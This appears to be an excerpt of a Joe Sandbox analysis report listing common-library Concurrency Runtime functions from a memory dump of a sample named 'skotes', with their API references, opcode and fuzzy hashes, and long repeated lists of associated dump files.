Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 5b54567888ab56067032c2f05db57f61bf34c873578c9091b82021a615e2522e
Instruction ID: b32b44e80661b542a993c3c0172ac07326875602c4032ce80638182158feea2a
Opcode Fuzzy Hash: 5b54567888ab56067032c2f05db57f61bf34c873578c9091b82021a615e2522e
Instruction Fuzzy Hash: A421DA75A00708DFDB05EF64D48ADDDB7B4EF05311B244065FA01AF251EBB9AD09CB61

Function 0075A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0075A069

Part of subcall function 0075B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0075B5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0075A07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0075A0CB

Part of subcall function 0075AB41: List.LIBCONCRT ref: 0075AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0075A0DB

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: 134cffb157bfc10aad217849c5ec4afbd1afa2e2f29f9b2b44b1f9f8cd8257e4
Instruction ID: b6f0ec75567b3d71f81d6e48642c9c9befa82da3bb640725e895817f27b1b7c5
Opcode Fuzzy Hash: 134cffb157bfc10aad217849c5ec4afbd1afa2e2f29f9b2b44b1f9f8cd8257e4
Instruction Fuzzy Hash: 01218E31500614EFCB25EF65D9908AAF3F5FF487017004A6EE847A7651DBB8F909CBA2

Function 00754885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00754893
ListArray.LIBCONCRT ref: 007548A5

Part of subcall function 00755555: _InternalDeleteHelper.LIBCONCRT ref: 00755564

ListArray.LIBCONCRT ref: 007548AF
_InternalDeleteHelper.LIBCONCRT ref: 007548C8

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 0866757495133ffef3adfcb269809811b425810ec72ce38957fd1569f166a3f4
Instruction ID: 45a3e954dc57ecddbf0599f6a6c70e871b672335c3aa1dc9f7e73cc3c5ecc9a8
Opcode Fuzzy Hash: 0866757495133ffef3adfcb269809811b425810ec72ce38957fd1569f166a3f4
Instruction Fuzzy Hash: B9012631300921FFCA22BB64C886EAEB76AFF447157000029FC445B612DB68FC6987A0

Function 0075EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0075EE6A
ListArray.LIBCONCRT ref: 0075EE7C

Part of subcall function 0075EF29: _InternalDeleteHelper.LIBCONCRT ref: 0075EF3B

ListArray.LIBCONCRT ref: 0075EE86
_InternalDeleteHelper.LIBCONCRT ref: 0075EE9F

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: c1a56bf3e189fc6c3426b69210a94ada36e029784f94a304a32ba314b99bf0f4
Instruction ID: edeab32691e131cc0af867db783874ee4ef069549f6f1c8133b2dfa3b2b7df74
Opcode Fuzzy Hash: c1a56bf3e189fc6c3426b69210a94ada36e029784f94a304a32ba314b99bf0f4
Instruction Fuzzy Hash: D601A271700621EFDA2A6B60C887EAABB69FF447117010029FC4597651CF69ED1986E1

Function 0075D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0075D0C5
ListArray.LIBCONCRT ref: 0075D0D7

Part of subcall function 0075C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0075C6C4

ListArray.LIBCONCRT ref: 0075D0E1
_InternalDeleteHelper.LIBCONCRT ref: 0075D0FA

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 6c0141d08947051b6447544f536673ad65511b559d44956fc87b782498e70c20
Instruction ID: 31b06d76a975fe128af80b6aad5c38caa789e3d8dbb46d8e912584a3687114d6
Opcode Fuzzy Hash: 6c0141d08947051b6447544f536673ad65511b559d44956fc87b782498e70c20
Instruction Fuzzy Hash: 8B01D671300625EFCA367B60C8CAEEEB769FF44711B014029FC4497651DFA8EC5A86E1

Function 007633C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007633DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 007633EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00763407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0076341F

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
